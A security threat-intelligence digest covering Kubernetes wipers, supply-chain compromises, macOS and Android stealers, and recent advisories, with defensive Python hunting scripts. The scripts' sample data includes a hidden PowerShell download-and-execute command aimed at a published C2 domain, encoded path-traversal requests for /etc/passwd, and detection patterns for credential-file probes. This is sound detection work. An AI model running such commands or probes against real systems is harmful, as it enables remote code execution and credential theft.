EvilBit Threat Digest - Wipers in the Cluster, Thieves in the Toolchain
Wipers riding Kubernetes, supply chains turned inside out, and "trusted" platforms doing the con's heavy lifting. This week's threats hide where you already look.
The theme this week isn't "new exploits" but "new places to hide old sins": Kubernetes as a delivery bus, update channels as a smuggling tunnel, and "trusted" platforms (GitHub, PyPI, Firebase) as the stage crew for the con.
Grab the flashlight. Let's walk.
Cloud-native malware stops pretending to be subtle
CanisterWorm gets teeth: a Kubernetes wiper with a passport stamp
TeamPCP's CanisterWorm isn't just "malware that runs in containers." It uses Kubernetes like it was designed for adversaries: schedule something once, and it shows up everywhere.
The standout twist: a geopolitically targeted destructive mode. If a node looks Iranian-locale configured, the wiper path kicks in, wiping nodes and forcing reboots. If it doesn't, the malware plays the long game: it installs persistent backdoors and keeps moving. That's a nasty dual-use posture: destroy one set of victims, quietly own the rest. Aikido Security: CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran | Ars Technica: Self-propagating malware poisons open source software and wipes Iran-based machines | BleepingComputer: TeamPCP deploys Iran-targeted wiper in Kubernetes attacks | The Hacker News: Trivy Hack Spreads Infostealer via Docker, Triggers Worm and Kubernetes Wiper
Mechanically, the cluster-wide reach comes from DaemonSet abuse (think "run this privileged pod on every node"), paired with the kinds of shortcuts that still somehow exist in 2026:
- Stolen SSH keys for lateral movement
- Exposed Docker API on port 2375 (no auth, no TLS, no hope)
- Subnet crawling like it's 2004 and you just installed nmap for the first time
Defender takeaway: Kubernetes isn't merely a target; it's an amplifier. If your environment lets privileged pods mount / via hostPath, you've basically given malware a skeleton key and a map.
Defender sanity check (hunt-level, not "generate me signatures"):
- Inventory kube-system for unexpected DaemonSets (Aikido calls out names like host-provisioner-iran / host-provisioner-std)
- On nodes, look for suspicious systemd services (e.g., pgmonitor, internal-monitor) and odd Python runners in /var/lib/*
- Treat port 2375 exposure as an incident until proven otherwise
Aikido Security: CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran
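One way to script the DaemonSet part of that hunt, written here as an added example (not Aikido's or any vendor's tooling): it reads the JSON that `kubectl get daemonsets -n kube-system -o json` would produce and flags DaemonSets that are not on an allowlist or that mount the node's / via hostPath, the two things the CanisterWorm write-up turns on. The allowlist, the sample payload, and the kube-proxy stand-in are assumptions constructed for the demo; only the host-provisioner-std name comes from the report.

```python
import json

# Constructed sample in the shape of `kubectl get daemonsets -n kube-system -o json`,
# trimmed to the fields this check reads. host-provisioner-std is one of the names
# Aikido reported; kube-proxy stands in for a legitimate privileged DaemonSet.
SAMPLE_DAEMONSETS = json.loads("""
{"items": [
 {"metadata": {"name": "kube-proxy", "namespace": "kube-system"},
  "spec": {"template": {"spec": {
    "containers": [{"name": "kube-proxy", "image": "registry.k8s.io/kube-proxy:v1.29.0",
                    "securityContext": {"privileged": true}}],
    "volumes": [{"name": "lib-modules", "hostPath": {"path": "/lib/modules"}}]}}}},
 {"metadata": {"name": "host-provisioner-std", "namespace": "kube-system"},
  "spec": {"template": {"spec": {
    "containers": [{"name": "agent", "image": "docker.io/library/python:3",
                    "securityContext": {"privileged": true}}],
    "volumes": [{"name": "root", "hostPath": {"path": "/"}}]}}}}
]}
""")

# Assumed allowlist: the DaemonSets you expect in kube-system on this cluster.
EXPECTED = {"kube-proxy", "fluent-bit", "node-exporter"}


def daemonset_findings(payload, expected=EXPECTED):
    """Return [(name, reasons)] for DaemonSets that deserve a human look."""
    findings = []
    for item in payload.get("items", []):
        name = item["metadata"]["name"]
        pod = item["spec"]["template"]["spec"]
        privileged = any((c.get("securityContext") or {}).get("privileged")
                         for c in pod.get("containers", []))
        root_mount = any((v.get("hostPath") or {}).get("path") == "/"
                         for v in pod.get("volumes", []))
        # A known DaemonSet with a narrow hostPath is normal; report anything
        # unexpected, or anything (known or not) that mounts the node's / .
        if name not in expected or root_mount:
            reasons = []
            if name not in expected:
                reasons.append("not in allowlist")
            if privileged:
                reasons.append("privileged container")
            if root_mount:
                reasons.append("hostPath mounts node root /")
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in daemonset_findings(SAMPLE_DAEMONSETS):
        print(f"{name}: {', '.join(reasons)}")
```

Pipe real `kubectl ... -o json` output into `json.load` and pass it to `daemonset_findings`; a DaemonSet that mounts / stays reported even when it is allowlisted, because that is the skeleton-key case the text warns about.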
Bucklog's Kubernetes scanning fleet: "internet background radiation" with a control plane
GreyNoise profiled a Kubernetes-orchestrated scanning fleet (AS211590, "Bucklog") running out of a French hosting provider that looks less like hobby scanning and more like a managed operation: systematic probing, credential harvesting patterns, and targeted exploitation of n8n, where CVE-2026-21858 gets the spotlight. Bucklog's Machine: Inside a Kubernetes Scanning Fleet
The detail that matters operationally: they're not just poking login pages. They're hunting high-value files (.env, .aws/credentials, .git/config) and probing for path traversal weaknesses against brittle WAF logic. GreyNoise also notes protocol fingerprinting (JA4H/JA4T) to cluster activity, useful when the attacker rotates infrastructure but can't stop being themselves. Bucklog's Machine: Inside a Kubernetes Scanning Fleet
Plain-English takeaway: if your edge is exposed, assume it's being profiled by actors who catalog first, exploit second. Patch n8n fast, and treat repeated "weirdly encoded traversal-ish paths" as early warning, not noise. Note that CVE-2025-68613 (another critical n8n RCE) is also in active exploitation separately; if you're running n8n, both CVEs need your attention.
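The "catalog first, exploit second" traffic GreyNoise describes is easy to surface in your own access logs. Below is an added example (not GreyNoise's code) that scans combined-format log lines for the sensitive-file probes named above (.env, .aws/credentials, .git/config) and for traversal attempts, decoding repeated percent-encoding the way a brittle WAF might fail to; the log lines are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format) illustrating the probing
# GreyNoise describes: sensitive-file hunting and double-encoded traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2026:10:01:02 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2026:10:01:03 +0000] "GET /.aws/credentials HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2026:10:01:04 +0000] "GET /static/..%252f..%252fetc/passwd HTTP/1.1" 400 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Apr/2026:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Apr/2026:10:02:11 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)')
SECRET_PATHS = ("/.env", "/.aws/credentials", "/.git/config")


def decode_fully(path, rounds=3):
    """Undo repeated percent-encoding (%252f -> %2f -> /), which a brittle WAF may not."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request(path):
    """Label a request path, or return None if it looks ordinary."""
    decoded = decode_fully(path)
    if any(decoded.endswith(s) for s in SECRET_PATHS):
        return "secret-file-probe"
    if "../" in decoded or "..\\" in decoded:
        return "traversal-probe (encoded)" if decoded != path else "traversal-probe"
    return None


def scan_log(text):
    """Return {client_ip: [(raw_path, label), ...]} for requests that look like profiling."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        label = classify_request(path)
        if label:
            hits.setdefault(ip, []).append((path, label))
    return hits
```

A client that trips several labels in a short window is the profiling behaviour the text calls early warning; the 404s on secret paths matter as much as the 200s.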
Supply chain: still the easiest way into "trusted" environments
EmEditor update channel compromised: trust turned into code execution
Microsoft detailed a supply-chain compromise affecting EmEditor updates: malicious code injected into update packages via a WordPress compromise of EmEditor's download infrastructure. The payload used MSI custom actions to execute PowerShell (Invoke-RestMethod piped to Invoke-Expression), leading to infostealer and backdoor deployment with C2 communication across multiple domains. When Trust Becomes the Attack Vector: Analysis of the EmEditor Supply-Chain Compromise
Takeaway: treat "signed and updated" as necessary, not sufficient. Your detections should still notice when a newly updated app suddenly starts behaving like a downloader.
Hunting note: Microsoft's report names C2 domains including emeditorjp[.]com and emeditorde[.]com. If you have EmEditor deployed, check DNS and proxy logs for those indicators and look for MSI installs spawning PowerShell with IEX/Invoke-Expression patterns.
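To turn that hunting note into something you can run over exported process events, here is an added example (not Microsoft's detection logic): it refangs the two published domains, then flags any msiexec.exe-parented PowerShell whose command line carries the Invoke-RestMethod / Invoke-Expression pattern (or the irm / iex aliases). The event records are constructed in a Sysmon-like shape, and the EmEditor.exe path is an assumption, not a value from the report.

```python
import re

# Indicators named in Microsoft's EmEditor report, kept defanged as published.
C2_DOMAINS_DEFANGED = ["emeditorjp[.]com", "emeditorde[.]com"]

def refang(domain):
    """Turn a defanged indicator back into a matchable hostname."""
    return domain.replace("[.]", ".").lower()

C2_DOMAINS = {refang(d) for d in C2_DOMAINS_DEFANGED}
# Download-and-execute cmdlets from the report, plus their built-in aliases.
DOWNLOAD_EXEC = re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod)\b", re.I)

# Constructed process-creation events in a Sysmon-like shape. Only the first models
# the MSI custom action -> PowerShell -> IEX chain; the EmEditor.exe path is assumed.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "IEX (irm https://emeditorjp.com/)"'},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Program Files\EmEditor\EmEditor.exe",
     "CommandLine": r'"C:\Program Files\EmEditor\EmEditor.exe"'},
]

def basename(win_path):
    return win_path.lower().rsplit("\\", 1)[-1]

def is_msi_spawned_download_exec(ev):
    """True when msiexec.exe spawns PowerShell whose command line fetches and IEXes code."""
    if basename(ev.get("ParentImage", "")) != "msiexec.exe":
        return False
    if basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return False
    return DOWNLOAD_EXEC.search(ev.get("CommandLine", "")) is not None

def c2_domains_in(text):
    # Known C2 hostnames appearing anywhere in a log line or command line.
    return sorted(d for d in C2_DOMAINS if d in text.lower())

def triage(events):
    """Return [(event_index, reasons)] for events matching the hunting note."""
    out = []
    for i, ev in enumerate(events):
        reasons = []
        if is_msi_spawned_download_exec(ev):
            reasons.append("msiexec -> powershell with IEX/Invoke-RestMethod pattern")
        reasons += [f"known C2 domain {d}" for d in c2_domains_in(ev.get("CommandLine", ""))]
        if reasons:
            out.append((i, reasons))
    return out
```

`c2_domains_in` works equally on DNS or proxy log lines, which is where the domain indicators will usually show up before any process telemetry does.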
LiteLLM's PyPI package hijacked (TeamPCP again)
If the CanisterWorm story made you tired, here's your espresso shot: TeamPCP is also tied to a supply-chain hit on LiteLLM's PyPI package, turning a popular developer dependency into a credential-stealing delivery channel. TeamPCP Hijacks LiteLLM's PyPI Package: Credential Stealer Hits 40k-Star Project
Same pattern we keep watching: compromise the place developers already trust, then steal the secrets that let you compromise the next place. CI tokens, cloud creds, API keys. Too many secrets, all in one requirements.txt.
Defender note: if you don't have dependency pinning + provenance checks in your build pipeline, you're relying on vibes and the kindness of maintainers.
macOS and Android: the "secondary platforms" doing primary damage
UPDATE: ClickFix goes macOS; MioLab builds a stealer empire aimed at crypto
We've talked before about the ClickFix social-engineering pattern: pages that nudge users to copy/paste commands or "verify" something in a way that conveniently runs attacker code. This week's update: LevelBlue outlines MioLab, a macOS stealer operation targeting the cryptocurrency ecosystem, with ClickFix-style tradecraft in the mix. "Say My Name": How MioLab is building MacOS Stealer Empire
Fresh angle here: macOS stealers aren't just grabbing browser passwords anymore; the business model is tuned for crypto workflows. Wallet material, session tokens, and anything that turns "one compromised laptop" into "one drained treasury."
Practical takeaway: the control you want isn't "install fewer apps" (good luck). It's:
- tighter permission governance (especially around keychain and accessibility prompts),
- and aggressive egress + known-C2 blocking for endpoints that handle financial operations. "Say My Name": How MioLab is building MacOS Stealer Empire
GhostClaw/GhostLoader expands beyond npm: GitHub repos and AI workflows as delivery
Jamf's write-up on GhostClaw / GhostLoader is a reminder that "download code from GitHub" is now a malware installation method, not a developer habit. The campaign's delivery expands into GitHub repositories and AI workflows, with macOS infostealer behavior and concrete IOCs (including a C2 domain). GhostClaw expands beyond npm: GitHub repositories and AI workflows deliver macOS infostealer
When your workflows start auto-fetching artifacts and running helper scripts, "repo trust" becomes an execution boundary. There is no sandbox. There's just code that ran before you decided to trust it.
Android: fake ChatGPT invites + preinstalled firmware malware (two very different traps)
Two Android threads worth holding in your head at the same time:
- A campaign pushing fake ChatGPT beta invitations, abusing Firebase App Distribution to look legitimate enough to slip past human suspicion. Fake ChatGPT Invitations Target Android Users In New Malware Campaign
- Sophos reporting firmware-level malware pre-installed on some Android devices (Sophos calls it "Keenadu," embedded in libandroid_runtime.so), meaning compromise can exist below the OS layer you manage, persist across resets, and resist normal remediation. Affected manufacturers include BLU, DOOGEE, Ulefone, and Gigaset, among others. Android devices ship with firmware-level malware
Combined takeaway: Android risk isn't just "users install bad apps." It's also supply chain integrity: what you bought, where it was built, and whether your MDM/EDR even has a fighting chance at visibility.
ClayRat: a straightforward Android RAT with spyware behavior
ClayRat is another Android RAT/spyware entry in the "steal SMS, call logs, contacts, and remote control the device" hall of fame. It's not subtle, but it doesn't have to be; Android infection at scale often succeeds on distribution, not innovation. ClayRat: What was that?
Social engineering keeps winning (because it scales)
FAUX#ELEVATE: French "CV lure" chain that completes in ~25 seconds
Securonix's FAUX#ELEVATE report is a clean example of modern "speedrun malware": obfuscated French CV-themed VBScript, rapid staging, credential theft from browsers, file exfil, Monero mining, plus RAT capability, all finishing fast to beat human reaction time. Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers
Two details worth watching for:
- The VBScript is reportedly 99%+ junk content: obfuscation tuned for "make static scanning expensive."
- Victim selection logic aims at domain-joined enterprise systems, because that's where the cookies taste better. Analyzing FAUX#ELEVATE: Threat Actors Target France with CV Lures to Deploy Crypto Miners and Infostealers
UPDATE: Tycoon2FA didn't stay dead after the takedown
Earlier this month we covered the Tycoon2FA disruption. CrowdStrike's update is the part nobody likes: the platform persists following takedown. Activity dropped to roughly 25% on the day of the Europol seizure, then poured back into shape within days. That resilience is the product now: kits that can lose infrastructure and keep selling "MFA bypass" via adversary-in-the-middle session theft. Tycoon2FA Phishing-as-a-Service Platform Persists Following Takedown
Takeaway: takedowns buy you time, not safety. The durable fix is still on the defender side: phishing-resistant auth (FIDO2/WebAuthn), conditional access that cares about device posture, and tightening session controls where your IdP supports it.
Advisory radar: patching without the comfort of a neat CVE list
NGINX Plus / Open Source advisory from Canada's CCCS + F5
Canada's CCCS and F5 put out an advisory for NGINX Plus R32 through R36 and NGINX Open Source versions across a wide range, covering CVE-2026-1642, CVE-2026-27654, and CVE-2026-32647. Fix versions: R36 P3, R35 P2, or R32 P5. NGINX is everywhere, and "everywhere" is a priority category. F5 security advisory (AV26-273) | K000160336: Out-of-band Security Notification
Plain-English takeaway: if you run NGINX at the edge and you're behind on updates, don't wait for drama, or a PoC, to tell you which side of probability you're on.
Closing: The control planes are the battleground
We used to talk about "the perimeter" like it was a wall. It's not. It's a set of control planes: clusters that schedule code, registries that deliver code, update channels that bless code, and identity systems that vouch for the humans running it.
This week's lesson is painfully consistent: if attackers can write to your control plane, they don't need a clever exploit. They just need you to do what you already do, at scale.
Eyes on the network. Claws ready.
- KryptoKat